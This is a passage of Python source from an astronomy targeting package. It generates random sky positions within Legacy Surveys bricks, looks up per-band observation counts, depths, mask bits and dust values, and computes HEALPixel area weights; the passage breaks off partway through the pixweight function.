from desitarget.internal import sharedmem
# ADM set up the DESI default logger.
from desiutil import brick
from desiutil.log import get_logger
# ADM a look-up dictionary that converts priorities to bit-names.
bitperprio = {dMx[bn].priorities["UNOBS"]: dMx[bn] for bn in dMx.names()
if len(dMx[bn].priorities) > 0}
# ADM set up the Legacy Surveys bricks objects.
bricks = brick.Bricks(bricksize=0.25)
# ADM make a BRICKNAME->BRICKID look-up table for speed.
bricktable = bricks.to_table()
bricklookup = {bt["BRICKNAME"]: bt["BRICKID"] for bt in bricktable}
# ADM set up the default logger from desiutil.
log = get_logger()
# ADM start the clock.
start = time()
def dr_extension(drdir):
"""Extension information for files in a Legacy Survey coadd directory
Parameters
----------
drdir : :class:`str`
The root directory for a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
Returns
-------
:class:`str`
Whether the file extension is 'gz' or 'fz'.
:class:`int`
Corresponding FITS extension number to be read (0 or 1).
Notes
-----
- If the directory structure seems wrong or can't be found then
the post-DR4 convention (.fz files) is returned.
"""
try:
# ADM a generator of all of the nexp files in the coadd directory.
gen = iglob(drdir+"/coadd/*/*/*nexp*")
# ADM pop the first file in the generator.
anexpfile = next(gen)
extn = anexpfile[-2:]
if extn == 'gz':
return 'gz', 0
# ADM this is triggered if the generator is empty.
except StopIteration:
msg = "couldn't find any nexp files in {}...".format(
os.path.join(drdir, "coadd"))
msg += "Defaulting to '.fz' extensions for Legacy Surveys coadd files"
log.info(msg)
return 'fz', 1
def finalize_randoms(randoms):
"""Add the standard "final" columns that are also added in targeting.
Parameters
----------
randoms : :class:`~numpy.ndarray`
A random catalog as made by, e.g., :func:`select_randoms()`
with `nomtl=True` or `select_randoms_bricks()` with
`nomtl=False`. This function adds the default MTL information.
Returns
-------
:class:`~numpy.array`
The random catalog after the "final" targeting columns (such as
"DESI_TARGET", etc.) have been added.
Notes
-----
- Typically used in conjunction with :func:`add_default_mtl()`
"""
# ADM make every random the highest-priority target.
dt = np.zeros_like(randoms["RA"]) + bitperprio[np.max(list(bitperprio))]
return finalize(randoms, dt, dt*0, dt*0, randoms=True)
def rewrite_randoms_in_hp(fn, outdn, nside, verbose=True, ntest=None):
"""Rewrite randoms in HEALPixels, in files that can use io functions.
Parameters
----------
fn : :class:`str`
The filename of a monolithic random catalog to be rewritten split
across HEALPixels. For full functionality, include the entire
directory string to be searched for the data release number.
outdn : :class:`str`
Output directory to which to write the files. The sub-directory
structure and filenames are built on-the-fly from the header of
`fn` (which must correspond to a typical random catalog).
nside : :class:`int`
The NESTED HEALPixel resolution at which to write files.
verbose : :class:`bool`, optional, defaults to ``True``
If ``True`` then log extra information.
ntest : :class:`int`, optional, default to ``None``
If passed (and not ``None``) then read the first `ntest` randoms
instead of the entire catalog. Useful for testing.
Returns
-------
Nothing, but rewrites the randoms in `fn` split across HEALPixels.
Notes
-----
- Really just a simple wrapper on :func:`io.write_randoms_in_hp()`
that also reads the input file.
"""
t0 = time()
from desitarget.io import write_randoms_in_hp
# ADM read in the random catalog (and header).
if ntest is None:
randoms, hdr = fitsio.read(fn, header=True)
else:
randoms, hdr = fitsio.read(fn, header=True, rows=np.arange(ntest))
if verbose:
log.info('Read {} randoms from {}...t={:.1f}m'
.format(len(randoms), fn, (time()-t0)/60.))
# ADM determine all possible pixels at the passed nside.
pixlist = np.arange(hp.nside2npix(nside))
# ADM write the catalog back out split-by-healpixel
_, _ = write_randoms_in_hp(randoms, outdn, nside, pixlist,
verbose=verbose, infile=fn, hdr=hdr)
if verbose:
log.info('Done...t={:.1f}m'.format((time()-t0)/60.))
return
def add_default_mtl(randoms, seed):
"""Add default columns that are added by MTL.
Parameters
----------
randoms : :class:`~numpy.ndarray`
A random catalog as made by, e.g., :func:`select_randoms()`
with `nomtl=True` or `select_randoms_bricks()` with
`nomtl=False`. This function adds the default MTL information.
seed : :class:`int`
A seed for the random generator that sets the `SUBPRIORITY`.
Returns
-------
:class:`~numpy.array`
The random catalog after being passed through MTL.
Notes
-----
- Typically you will need to run :func:`finalize_randoms()`
first, to populate the columns for the target bits.
"""
from desitarget.mtl import make_mtl
randoms = np.array(make_mtl(randoms, obscon="DARK"))
# ADM add OBCONDITIONS that will work for any obscon.
from desitarget.targetmask import obsconditions as obscon
randoms["OBSCONDITIONS"] = obscon.mask("|".join(obscon.names()))
# ADM add a random SUBPRIORITY.
np.random.seed(616+seed)
nrands = len(randoms)
randoms["SUBPRIORITY"] = np.random.random(nrands)
return randoms
def randoms_in_a_brick_from_edges(ramin, ramax, decmin, decmax, density=100000,
poisson=True, wrap=True, seed=1):
"""For brick edges, return random (RA/Dec) positions in the brick.
Parameters
----------
ramin : :class:`float`
The minimum "edge" of the brick in Right Ascension (degrees).
ramax : :class:`float`
The maximum "edge" of the brick in Right Ascension (degrees).
decmin : :class:`float`
The minimum "edge" of the brick in Declination (degrees).
decmax : :class:`float`
The maximum "edge" of the brick in Declination (degrees).
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg.
poisson : :class:`boolean`, optional, defaults to ``True``
Modify the number of random points so that instead of simply
being brick area x density, the number is drawn from a Poisson
distribution with an expectation of brick area x density.
wrap : :class:`boolean`, optional, defaults to ``True``
If ``True``, bricks with `ramax`-`ramin` > 350o are assumed to
wrap, which is corrected by subtracting 360o from `ramax`, as is
reasonable for small bricks. ``False`` turns of this correction.
seed : :class:`int`, optional, defaults to 1
Random seed to use when shuffling across brick boundaries.
The actual np.random.seed defaults to::
seed*int(1e7)+int(4*ramin)*1000+int(4*(decmin+90))
Returns
-------
:class:`~numpy.array`
Right Ascensions of random points in brick (degrees).
:class:`~numpy.array`
Declinations of random points in brick (degrees).
"""
# ADM create a unique random seed on the basis of the brick.
# ADM note this is only unique for bricksize=0.25 for bricks
# ADM that are more than 0.25 degrees from the poles.
uniqseed = seed*int(1e7)+int(4*ramin)*1000+int(4*(decmin+90))
# ADM np.random only allows seeds < 2**32...
maxseed = (2**32-int(4*ramin)*1000-int(4*(decmin+90)))/1e7
if seed > maxseed:
msg = 'seed must be < {} but you passed {}!!!'.format(maxseed, seed)
log.critical(msg)
raise ValueError(msg)
np.random.seed(uniqseed)
# ADM generate random points within the brick at the requested density
# ADM guard against potential wraparound bugs (assuming bricks are typical
# ADM sizes of 0.25 x 0.25 sq. deg., or not much larger than that.
if wrap:
if ramax - ramin > 350.:
ramax -= 360.
spharea = box_area([ramin, ramax, decmin, decmax])
if poisson:
nrand = int(np.random.poisson(spharea*density))
else:
nrand = int(spharea*density)
# log.info('Full area covered by brick is {:.5f} sq. deg....t = {:.1f}s'
# .format(spharea,time()-start))
ras = np.random.uniform(ramin, ramax, nrand)
sindecmin, sindecmax = np.sin(np.radians(decmin)), np.sin(np.radians(decmax))
decs = np.degrees(
np.arcsin(1.-np.random.uniform(1-sindecmax, 1-sindecmin, nrand)))
nrand = len(ras)
# log.info('Generated {} randoms in brick with bounds [{:.3f},{:.3f},{:.3f},{:.3f}]...t = {:.1f}s'
# .format(nrand,ramin,ramax,decmin,decmax,time()-start))
return ras, decs
def randoms_in_a_brick_from_name(brickname, drdir, density=100000):
"""For a given brick name, return random (RA/Dec) positions in the brick.
Parameters
----------
brickname : :class:`str`
Name of brick in which to generate random points.
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg. As a typical brick is
~0.25 x 0.25 sq. deg. about (0.0625*density) points will be returned.
Returns
-------
:class:`~numpy.array`
Right Ascensions of random points in brick.
:class:`~numpy.array`
Declinations of random points in brick.
Notes
-----
- First version copied shamelessly from Anand Raichoor.
"""
# ADM read in the survey bricks file to determine the brick boundaries
hdu = fits.open(drdir+'survey-bricks.fits.gz')
brickinfo = hdu[1].data
wbrick = np.where(brickinfo['brickname'] == brickname)[0]
if len(wbrick) == 0:
log.error('Brick {} does not exist'.format(brickname))
# else:
# log.info('Working on brick {}...t = {:.1f}s'.format(brickname,time()-start))
brick = brickinfo[wbrick][0]
ramin, ramax, decmin, decmax = brick['ra1'], brick['ra2'], brick['dec1'], brick['dec2']
# ADM create a unique random seed on the basis of the brick.
# ADM note this is only unique for bricksize=0.25 for bricks
# ADM that are more than 0.25 degrees from the poles.
uniqseed = int(4*ramin)*1000+int(4*(decmin+90))
np.random.seed(uniqseed)
# ADM generate random points within the brick at the requested density
# ADM guard against potential wraparound bugs
if ramax - ramin > 350.:
ramax -= 360.
spharea = box_area([ramin, ramax, decmin, decmax])
nrand = int(spharea*density)
# log.info('Full area covered by brick {} is {:.5f} sq. deg....t = {:.1f}s'
# .format(brickname,spharea,time()-start))
ras = np.random.uniform(ramin, ramax, nrand)
sindecmin, sindecmax = np.sin(np.radians(decmin)), np.sin(np.radians(decmax))
decs = np.degrees(np.arcsin(1.-np.random.uniform(1-sindecmax, 1-sindecmin, nrand)))
nrand = len(ras)
# log.info('Generated {} randoms in brick {} with bounds [{:.3f},{:.3f},{:.3f},{:.3f}]...t = {:.1f}s'
# .format(nrand,brickname,ramin,ramax,decmin,decmax,time()-start))
return ras, decs
def pre_or_post_dr8(drdir):
"""Whether the imaging surveys directory structure is before or after DR8
Parameters
----------
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
Returns
-------
:class:`list`
For DR8, this just returns the original directory as a list. For DR8
this returns a list of two directories, one corresponding to DECaLS
and one corresponding to BASS/MzLS.
Notes
-----
- If the directory structure seems wrong or missing then the DR8
(and after) convention of a north/south split is assumed.
"""
if os.path.exists(os.path.join(drdir, "coadd")):
drdirs = [drdir]
else:
drdirs = [os.path.join(drdir, region) for region in ["north", "south"]]
return drdirs
def dr8_quantities_at_positions_in_a_brick(ras, decs, brickname, drdir,
aprad=0.75):
"""Wrap `quantities_at_positions_in_a_brick` for DR8 and beyond.
Notes
-----
- See :func:`~desitarget.randoms.quantities_at_positions_in_a_brick`
for details. This wrapper looks for TWO coadd directories in
`drdir` (one for DECaLS, one for MzLS/BASS) and, if it finds two,
creates randoms for both surveys within the the passed brick. The
wrapper also defaults to the behavior for only having one survey.
"""
# ADM determine if we must traverse two sets of brick directories.
drdirs = pre_or_post_dr8(drdir)
# ADM make the dictionary of quantities for one or two directories.
qall = []
for dd in drdirs:
q = quantities_at_positions_in_a_brick(ras, decs, brickname, dd,
aprad=aprad)
# ADM don't count bricks where we never read a file header.
if q is not None:
qall.append(q)
# ADM concatenate everything in qall into one dictionary.
qcombine = {}
# ADM catch the case where a coadd directory is completely missing.
if len(qall) == 0:
log.warning("missing brick: {}".format(brickname))
else:
for k in qall[0].keys():
qcombine[k] = np.concatenate([q[k] for q in qall])
return qcombine
def quantities_at_positions_in_a_brick(ras, decs, brickname, drdir,
aprad=0.75, justlist=False):
"""Observational quantities (per-band) at positions in a Legacy Surveys brick.
Parameters
----------
ras : :class:`~numpy.array`
Right Ascensions of interest (degrees).
decs : :class:`~numpy.array`
Declinations of interest (degrees).
brickname : :class:`str`
Name of brick which contains RA/Dec positions, e.g., '1351p320'.
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
aprad : :class:`float`, optional, defaults to 0.75
Radii in arcsec of aperture for which to derive sky/fiber fluxes.
Defaults to the DESI fiber radius. If aprad < 1e-8 is passed,
the code to produce these values is skipped, as a speed-up, and
`apflux_` output values are set to zero.
justlist : :class:`bool`, optional, defaults to ``False``
If ``True``, return a MAXIMAL list of all POSSIBLE files needed
to run for `brickname` and `drdir`. Overrides other inputs, but
ra/dec still have to be passed as *something* (e.g., [1], [1]).
Returns
-------
:class:`dictionary`
The number of observations (`nobs_x`), PSF depth (`psfdepth_x`)
galaxy depth (`galdepth_x`), PSF size (`psfsize_x`), sky
background (`apflux_x`) and inverse variance (`apflux_ivar_x`)
at each passed position in each band x=g,r,z. Plus, the
`psfdepth_w1` and `_w2` depths and the `maskbits`, `wisemask_w1`
and `_w2` information at each passed position for the brick.
Also adds a unique `objid` for each random, a `release` if
a release number can be determined from the input `drdir`, and
the photometric system `photsys` ("N" or "S" for north or south).
Notes
-----
- First version copied shamelessly from Anand Raichoor.
"""
# ADM guard against too low a density of random locations.
npts = len(ras)
if npts == 0:
msg = 'brick {} is empty. Increase the density of random points!'.format(brickname)
log.critical(msg)
raise ValueError(msg)
# ADM a list to populate with the files required to run the code.
fnlist = []
# ADM determine whether the coadd files have extension .gz or .fz
# based on the DR directory.
extn, extn_nb = dr_extension(drdir)
# ADM the output dictionary.
qdict = {}
# as a speed up, we assume all images in different filters for the brick have the same WCS
# -> if we have read it once (iswcs=True), we use this info
iswcs = False
# ADM this will store the instrument name the first time we touch the wcs
instrum = None
rootdir = os.path.join(drdir, 'coadd', brickname[:3], brickname)
fileform = os.path.join(rootdir, 'legacysurvey-{}-{}-{}.fits.{}')
# ADM loop through the filters and store the number of observations
# ADM etc. at the RA and Dec positions of the passed points.
for filt in ['g', 'r', 'z']:
# ADM the input file labels, and output column names and output
# ADM formats for each of the quantities of interest.
qnames = zip(['nexp', 'depth', 'galdepth', 'psfsize', 'image'],
['nobs', 'psfdepth', 'galdepth', 'psfsize', 'apflux'],
['i2', 'f4', 'f4', 'f4', 'f4'])
for qin, qout, qform in qnames:
fn = fileform.format(brickname, qin, filt, extn)
if justlist:
fnlist.append(fn)
else:
# ADM only process the WCS if there's a file for this filter.
# ADM also skip calculating aperture fluxes if aprad ~ 0.
if os.path.exists(fn) and not (qout == 'apflux' and aprad < 1e-8):
img = fits.open(fn)[extn_nb]
if not iswcs:
# ADM store the instrument name, if it isn't stored.
instrum = img.header["INSTRUME"].lower().strip()
w = WCS(img.header)
x, y = w.all_world2pix(ras, decs, 0)
iswcs = True
# ADM get the quantity of interest at each location and
# ADM store in a dictionary with the filter and quantity.
if qout == 'apflux':
# ADM special treatment to photometer sky.
# ADM Read in the ivar image.
fnivar = fileform.format(brickname, 'invvar', filt, extn)
ivar = fits.open(fnivar)[extn_nb].data
with np.errstate(divide='ignore', invalid='ignore'):
# ADM ivars->errors, guard against 1/0.
imsigma = 1./np.sqrt(ivar)
imsigma[ivar == 0] = 0
# ADM aperture photometry at requested radius (aprad).
apxy = np.vstack((x, y)).T
aper = photutils.CircularAperture(apxy, aprad)
p = photutils.aperture_photometry(img.data, aper, error=imsigma)
# ADM store the results.
qdict[qout+'_'+filt] = np.array(p.field('aperture_sum'))
err = p.field('aperture_sum_err')
with np.errstate(divide='ignore', invalid='ignore'):
# ADM errors->ivars, guard against 1/0.
ivar = 1./err**2.
ivar[err == 0] = 0.
qdict[qout+'_ivar_'+filt] = np.array(ivar)
else:
qdict[qout+'_'+filt] = img.data[y.round().astype("int"), x.round().astype("int")]
# ADM if the file doesn't exist, set quantities to zero.
else:
if qout == 'apflux':
qdict['apflux_ivar_'+filt] = np.zeros(npts, dtype=qform)
qdict[qout+'_'+filt] = np.zeros(npts, dtype=qform)
# ADM add the MASKBITS and WISEMASK information.
fn = os.path.join(rootdir,
'legacysurvey-{}-maskbits.fits.{}'.format(brickname, extn))
# ADM only process the WCS if there's a file for this filter.
mnames = zip([extn_nb, extn_nb+1, extn_nb+2],
['maskbits', 'wisemask_w1', 'wisemask_w2'],
['>i2', '|u1', '|u1'])
if justlist:
fnlist.append(fn)
else:
for mextn, mout, mform in mnames:
if os.path.exists(fn):
img = fits.open(fn)[mextn]
# ADM use the WCS for the per-filter quantities if it exists.
if not iswcs:
# ADM store the instrument name, if it isn't yet stored.
instrum = img.header["INSTRUME"].lower().strip()
w = WCS(img.header)
x, y = w.all_world2pix(ras, decs, 0)
iswcs = True
# ADM add the maskbits to the dictionary.
qdict[mout] = img.data[y.round().astype("int"), x.round().astype("int")]
else:
# ADM if no files are found, populate with zeros.
qdict[mout] = np.zeros(npts, dtype=mform)
# ADM if there was no maskbits file, populate with BAILOUT.
if mout == 'maskbits':
qdict[mout] |= 2**10
# ADM populate the photometric system in the quantity dictionary.
if not justlist:
if instrum is None:
# ADM don't count bricks where we never read a file header.
return
elif instrum == 'decam':
qdict['photsys'] = np.array([b"S" for x in range(npts)], dtype='|S1')
else:
qdict['photsys'] = np.array([b"N" for x in range(npts)], dtype='|S1')
# log.info('Recorded quantities for each point in brick {}...t = {:.1f}s'
# .format(brickname,time()-start))
# ADM calculate and add WISE depths. The WCS is different for WISE.
iswcs = False
# ADM a dictionary of scalings from invvar to depth:
norm = {'W1': 0.240, 'W2': 0.255}
# ADM a dictionary of Vega-to-AB conversions:
vega_to_ab = {'W1': 2.699, 'W2': 3.339}
for band in ['W1', 'W2']:
# ADM the input file labels, and output column names and output
# ADM formats for each of the quantities of interest.
qnames = zip(['invvar'], ['psfdepth'], ['f4'])
for qin, qout, qform in qnames:
fn = fileform.format(brickname, qin, band, extn)
if justlist:
fnlist.append(fn)
else:
# ADM only process the WCS if there's a file for this band.
if os.path.exists(fn):
img = fits.open(fn)[extn_nb]
# ADM calculate the WCS if it wasn't, already.
if not iswcs:
w = WCS(img.header)
x, y = w.all_world2pix(ras, decs, 0)
iswcs = True
# ADM get the inverse variance at each location.
ivar = img.data[y.round().astype("int"), x.round().astype("int")]
# ADM convert to WISE depth in AB. From Dustin Lang on the
# decam-chatter mailing list on 06/20/19, 1:59PM MST:
# psfdepth_Wx_AB = invvar_Wx * norm_Wx**2 / fluxfactor_Wx**2
# where fluxfactor = 10.** (dm / -2.5), dm = vega_to_ab[band]
ff = 10.**(vega_to_ab[band] / -2.5)
# ADM store in a dictionary with the band and quantity.
qdict[qout+'_'+band] = ivar * norm[band]**2 / ff**2
# ADM if the file doesn't exist, set quantities to zero.
else:
qdict[qout+'_'+band] = np.zeros(npts, dtype=qform)
# ADM look up the RELEASE based on "standard" DR directory structure.
if justlist:
# ADM we need a tractor file. Then we have a list of all needed
# ADM files. So, return if justlist was passed as True.
tracdir = os.path.join(drdir, 'tractor', brickname[:3])
tracfile = os.path.join(tracdir, 'tractor-{}.fits'.format(brickname))
fnlist.append(tracfile)
return fnlist
# ADM populate the release number using a header from an nexp file.
fn = fileform.format(brickname, "nexp", '*', extn)
gen = iglob(fn)
try:
release = fitsio.read_header(next(gen), extn_nb)["DRVERSIO"]
# ADM if this isn't a standard DR structure, default to release=0.
except StopIteration:
release = 0
qdict["release"] = np.zeros_like((qdict['nobs_g'])) + release
# ADM assign OBJID based on ordering by RA. The ordering ensures that
# ADM northern and southern objects get the same OBJID.
qdict["objid"] = np.argsort(ras)
return qdict
def hp_with_nobs_in_a_brick(ramin, ramax, decmin, decmax, brickname, drdir,
density=100000, nside=256):
"""Given a brick's edges/name, count randoms with NOBS > 1 in HEALPixels touching that brick.
Parameters
----------
ramin : :class:`float`
The minimum "edge" of the brick in Right Ascension.
ramax : :class:`float`
The maximum "edge" of the brick in Right Ascension
decmin : :class:`float`
The minimum "edge" of the brick in Declination.
decmax : :class:`float`
The maximum "edge" of the brick in Declination.
brickname : :class:`~numpy.array`
Brick names that corresponds to the brick edges, e.g., '1351p320'.
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg. As a typical brick is
~0.25 x 0.25 sq. deg. about (0.0625*density) points will be returned.
nside : :class:`int`, optional, defaults to nside=256 (~0.0525 sq. deg. or "brick-sized")
The resolution (HEALPixel NESTED nside number) at which to build the map.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the following columns:
HPXPIXEL:
Integer numbers of (only) those HEALPixels that overlap the passed brick
HPXCOUNT:
Numbers of random points with one or more observations (NOBS > 0) in the
passed Data Release of the Legacy Surveys for each returned HPXPIXEL.
Notes
-----
- The HEALPixel numbering uses the NESTED scheme.
- In the event that there are no pixels with one or more observations in the passed
brick, and empty structured array will be returned.
"""
# ADM this is only intended to work on one brick, so die if a larger
# ADM array is passed.
if not isinstance(brickname, str):
log.fatal("Only one brick can be passed at a time!")
raise ValueError
# ADM generate an empty structured array to return in the event that
# ADM no pixels with counts were found.
hpxinfo = np.zeros(0, dtype=[('HPXPIXEL', '>i4'), ('HPXCOUNT', '>i4')])
# ADM generate random points in the brick at the requested density.
ras, decs = randoms_in_a_brick_from_edges(ramin, ramax, decmin, decmax,
density=density, wrap=False)
# ADM retrieve the number of observations for each random point.
nobs_g, nobs_r, nobs_z = nobs_at_positions_in_a_brick(ras, decs, brickname,
drdir=drdir)
# ADM only retain points with one or more observations in all bands.
w = np.where((nobs_g > 0) & (nobs_r > 0) & (nobs_z > 0))
# ADM for non-zero observations, populate pixel numbers and counts.
if len(w[0]) > 0:
pixnums = hp.ang2pix(nside, np.radians(90.-decs[w]), np.radians(ras[w]),
nest=True)
pixnum, pixcnt = np.unique(pixnums, return_counts=True)
hpxinfo = np.zeros(len(pixnum),
dtype=[('HPXPIXEL', '>i4'), ('HPXCOUNT', '>i4')])
hpxinfo['HPXPIXEL'] = pixnum
hpxinfo['HPXCOUNT'] = pixcnt
return hpxinfo
def get_dust(ras, decs, scaling=1, dustdir=None):
"""Get SFD E(B-V) values at a set of RA/Dec locations
Parameters
----------
ra : :class:`numpy.array`
Right Ascension in degrees
dec : :class:`numpy.array`
Declination in degrees
scaling : :class:`float`
Pass 1 for the SFD98 dust maps. A scaling of 0.86 corresponds
to the recalibration from Schlafly & Finkbeiner (2011).
dustdir : :class:`str`, optional, defaults to $DUST_DIR+'/maps'
The root directory pointing to SFD dust maps. If not
sent the code will try to use $DUST_DIR+'/maps' before failing.
Returns
-------
:class:`numpy.array`
E(B-V) values from the SFD dust maps at the passed locations
"""
from desiutil.dust import SFDMap
return SFDMap(mapdir=dustdir, scaling=scaling).ebv(ras, decs)
def get_quantities_in_a_brick(ramin, ramax, decmin, decmax, brickname,
density=100000, dustdir=None, aprad=0.75,
zeros=False, drdir=None, seed=1):
"""NOBS, DEPTHS etc. (per-band) for random points in a brick of the Legacy Surveys
Parameters
----------
ramin : :class:`float`
The minimum "edge" of the brick in Right Ascension
ramax : :class:`float`
The maximum "edge" of the brick in Right Ascension
decmin : :class:`float`
The minimum "edge" of the brick in Declination
decmax : :class:`float`
The maximum "edge" of the brick in Declination
brickname : :class:`~numpy.array`
Brick names that corresponds to the brick edges, e.g., '1351p320'
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg. As a typical brick is
~0.25 x 0.25 sq. deg. about (0.0625*density) points will be returned
dustdir : :class:`str`, optional, defaults to $DUST_DIR+'/maps'
The root directory pointing to SFD dust maps. If not
sent the code will try to use $DUST_DIR+'/maps' before failing.
aprad : :class:`float`, optional, defaults to 0.75
Radii in arcsec of aperture for which to derive sky/fiber fluxes.
Defaults to the DESI fiber radius. If aprad < 1e-8 is passed,
the code to produce these values is skipped, as a speed-up, and
`apflux_` output values are set to zero.
zeros : :class:`bool`, optional, defaults to ``False``
If ``True`` don't look up pixel-level info for the brick, just
return zeros. The only quantities populated are those that don't
need pixels (`RA`, `DEC`, `BRICKID`, `BRICKNAME`, `EBV`) and the
`NOBS_` quantities (which are set to zero).
drdir : :class:`str`, optional, defaults to None
The root directory pointing to a DR from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
Only necessary to pass if zeros is ``False``.
seed : :class:`int`, optional, defaults to 1
See :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the following columns:
RELEASE:
The Legacy Surveys release number.
OBJID:
A unique (to each brick) source identifier.
BRICKID:
ID that corresponds to the passed brick name.
BRICKNAME:
Passed brick name.
RA, DEC:
Right Ascension, Declination of a random location.
NOBS_G, R, Z:
Number of observations in g, r, z-band.
PSFDEPTH_G, R, Z:
PSF depth at this location in g, r, z.
GALDEPTH_G, R, Z:
Galaxy depth in g, r, z.
PSFDEPTH_W1, W2:
(PSF) depth in W1, W2 (AB mag system).
PSFSIZE_G, R, Z:
Weighted average PSF FWHM (arcsec).
APFLUX_G, R, Z:
Sky background extracted in `aprad`.
Will be zero if `aprad` < 1e-8 is passed.
APFLUX_IVAR_G, R, Z:
Inverse variance of sky background.
Will be zero if `aprad` < 1e-8 is passed.
MASKBITS:
Mask information. See header of extension 1 of *e.g.*
``coadd/132/1320p317/legacysurvey-1320p317-maskbits.fits.fz``
WISEMASK_W1:
Mask information. See header of extension 2 of *e.g.*
``coadd/132/1320p317/legacysurvey-1320p317-maskbits.fits.fz``
WISEMASK_W2:
Mask information. See header of extension 3 of *e.g.*
``coadd/132/1320p317/legacysurvey-1320p317-maskbits.fits.fz``
EBV:
E(B-V) at this location from the SFD dust maps.
PHOTSYS:
resolved north/south ('N' for an MzLS/BASS location,
'S' for a DECaLS location).
"""
# ADM only intended to work on one brick, so die for larger arrays.
if not isinstance(brickname, str):
log.fatal("Only one brick can be passed at a time!")
raise ValueError
# ADM generate random points in the brick at the requested density.
ras, decs = randoms_in_a_brick_from_edges(ramin, ramax, decmin, decmax,
density=density, wrap=False,
seed=seed)
# ADM only look up pixel-level quantities if zeros was not sent.
if not zeros:
# ADM retrieve the dictionary of quantities at each location.
qdict = dr8_quantities_at_positions_in_a_brick(ras, decs, brickname,
drdir, aprad=aprad)
# ADM catch where a coadd directory is completely missing.
if len(qdict) > 0:
# ADM if 2 different camera combinations overlapped a brick
# ADM then we need to duplicate the ras, decs as well.
if len(qdict['photsys']) == 2*len(ras):
ras = np.concatenate([ras, ras])
decs = np.concatenate([decs, decs])
# ADM the structured array to output.
qinfo = np.zeros(
len(ras),
dtype=[('RELEASE', '>i2'), ('BRICKID', '>i4'), ('BRICKNAME', 'S8'),
('OBJID', '>i4'), ('RA', '>f8'), ('DEC', 'f8'),
('NOBS_G', 'i2'), ('NOBS_R', 'i2'), ('NOBS_Z', 'i2'),
('PSFDEPTH_G', 'f4'), ('PSFDEPTH_R', 'f4'), ('PSFDEPTH_Z', 'f4'),
('GALDEPTH_G', 'f4'), ('GALDEPTH_R', 'f4'), ('GALDEPTH_Z', 'f4'),
('PSFDEPTH_W1', 'f4'), ('PSFDEPTH_W2', 'f4'),
('PSFSIZE_G', 'f4'), ('PSFSIZE_R', 'f4'), ('PSFSIZE_Z', 'f4'),
('APFLUX_G', 'f4'), ('APFLUX_R', 'f4'), ('APFLUX_Z', 'f4'),
('APFLUX_IVAR_G', 'f4'), ('APFLUX_IVAR_R', 'f4'), ('APFLUX_IVAR_Z', 'f4'),
('MASKBITS', 'i2'), ('WISEMASK_W1', '|u1'), ('WISEMASK_W2', '|u1'),
('EBV', 'f4'), ('PHOTSYS', '|S1')]
)
else:
qinfo = np.zeros(
len(ras),
dtype=[('BRICKID', '>i4'), ('BRICKNAME', 'S8'), ('RA', 'f8'), ('DEC', 'f8'),
('NOBS_G', 'i2'), ('NOBS_R', 'i2'), ('NOBS_Z', 'i2'),
('EBV', 'f4')]
)
# ADM retrieve the E(B-V) values for each random point.
ebv = get_dust(ras, decs, dustdir=dustdir)
# ADM we only looked up pixel-level quantities if zeros wasn't sent.
if not zeros:
# ADM catch the case where a coadd directory was missing.
if len(qdict) > 0:
# ADM store each quantity of interest in the structured array
# ADM remembering that the dictionary keys are lower-case text.
cols = qdict.keys()
for col in cols:
qinfo[col.upper()] = qdict[col]
# ADM add the RAs/Decs, brick id and brick name.
brickid = bricklookup[brickname]
qinfo["RA"], qinfo["DEC"] = ras, decs
qinfo["BRICKNAME"], qinfo["BRICKID"] = brickname, brickid
# ADM add the dust values.
qinfo["EBV"] = ebv
return qinfo
def pixweight(randoms, density, nobsgrz=[0, 0, 0], nside=256,
outarea=True, maskbits=None):
"""Fraction of area covered in HEALPixels by a random catalog.
Parameters
----------
randoms : :class:`~numpy.ndarray` or `str`
A random catalog as made by, e.g., :func:`select_randoms()` or
:func:`quantities_at_positions_in_a_brick()`, or a file that
contains such a catalog. Must contain the columns RA, DEC,
NOBS_G, NOBS_R, NOBS_Z, MASKBITS.
density : :class:`int`
The number of random points per sq. deg. At which the random
catalog was generated (see also :func:`select_randoms()`).
nobsgrz : :class:`list`, optional, defaults to [0,0,0]
The number of observations in each of g AND r AND z that must
be EXCEEDED to include a random point in the count. The default
is to include areas that have at least one observation in each
band ([0,0,0]). `nobsgrz = [0,-1,-1]` would count areas with at
least one (more than zero) observations in g-band but any number
of observations (more than -1) in r-band and z-band.
nside : :class:`int`, optional, defaults to nside=256
The resolution (HEALPixel NESTED nside number) at which to build
the map (default nside=256 is ~0.0525 sq. deg. or "brick-sized")
outarea : :class:`boolean`, optional, defaults to True
Print the total area of the survey for passed values to screen.
maskbits : :class:`int`, optional, defaults to ``None``
If not ``None`` then restrict to only locations with these
values of maskbits NOT set (bit inclusive, so for, e.g., 7,
restrict to random points with none of 2**0, 2**1 or 2**2 set).
Returns
-------
:class:`~numpy.ndarray`
The weight for EACH pixel in the sky at the passed nside.
Notes
-----
- `WEIGHT=1` means >=1 pointings across the entire pixel.
- `WEIGHT=0` means zero observations within it (e.g., perhaps
the pixel is completely outside of the LS DR footprint).
- `0 < WEIGHT < 1` for pixels that partially cover the LS DR
area with one or more observations.
- The index of the returned array is the HEALPixel integer.
"""
# ADM if a file name was passed for the random catalog, read it in.
if isinstance(randoms, str):
randoms = fitsio.read(randoms)
# ADM extract the columns of interest
ras, decs = randoms["RA"], randoms["DEC"]
nobs_g = randoms["NOBS_G"]
nobs_r = randoms["NOBS_R"]
nobs_z = randoms["NOBS_Z"]
# ADM only retain points with one or more observations in all bands
# ADM and appropriate maskbits values.
ii = (nobs_g > nobsgrz[0])
ii &= (nobs_r > nobsgrz[1])
ii &= (nobs_z > nobsgrz[2])
